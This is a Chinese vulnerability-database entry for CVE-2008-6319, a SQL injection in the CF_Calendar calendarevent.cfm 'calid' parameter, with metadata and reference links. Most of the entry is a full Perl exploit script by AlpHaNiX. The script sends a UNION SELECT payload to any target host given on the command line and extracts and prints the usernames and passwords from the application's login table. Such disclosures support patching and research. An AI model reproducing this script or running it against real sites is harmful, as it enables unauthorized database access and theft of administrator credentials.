CFMSource CF_Calendar 'calendarevent.cfm' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116993 漏洞类型 SQL注入
发布时间 2008-12-10 更新时间 2009-02-27
CVE编号 CVE-2008-6319 CNNVD-ID CNNVD-200902-636
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7413
https://cxsecurity.com/issue/WLB-2009030088
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-636
|漏洞详情
CF_Calendar是一个应用程序服务平台的日历模板。CF_Calendar的calendarevent.cfm中存在SQL注入漏洞。远程攻击者可以借助calid参数,执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl


use HTTP::Request;
use LWP::UserAgent;



print "\n ********************************************\n";
print " * CF_Calendar Remote SQL Injection Exploit *\n";
print " *       By AlpHaNiX                        *\n";
print " ********************************************\n";
print " ********************************************\n";
print " * usage : perl exploit.pl target           *\n";
print " *  contact : AlpHa[AT]HACKER[DOT]BZ        *\n";
print " ********************************************\n";



$alpha1 = "calendarevent.cfm?calid=";
$alpha2 = "0+union+select+1,concat(0x20616c7068616e69787761736865726520,username,0x20616e642070617373776f7264206973203a20,password,0x20616c7068616e69787761736865726520),3,4,null,6,7,8,9+from+login";



if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
print " Working on it\n\n";

my $alpha3 = $target.$alpha1.$alpha2;
my $request   = HTTP::Request->new(GET=>$alpha3);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
        my $res   = $response->content;
        if ($res =~ m/ alphanixwashere (.*)and password is : (.*) alphanixwashere /g) {
                my ($username,$passwd) = ($1,$2);
                print "Username : $username \n\n  password : $passwd  \n\n"

        }
        else { print " operation failed \n\n"; }
}
else { print "  Error, ".$response->status_line."\n\n"; }

# milw0rm.com [2008-12-10]
|参考资料

来源:BID
名称:32766
链接:http://www.securityfocus.com/bid/32766
来源:MILW0RM
名称:7413
链接:http://www.milw0rm.com/exploits/7413
来源:SECUNIA
名称:33074
链接:http://secunia.com/advisories/33074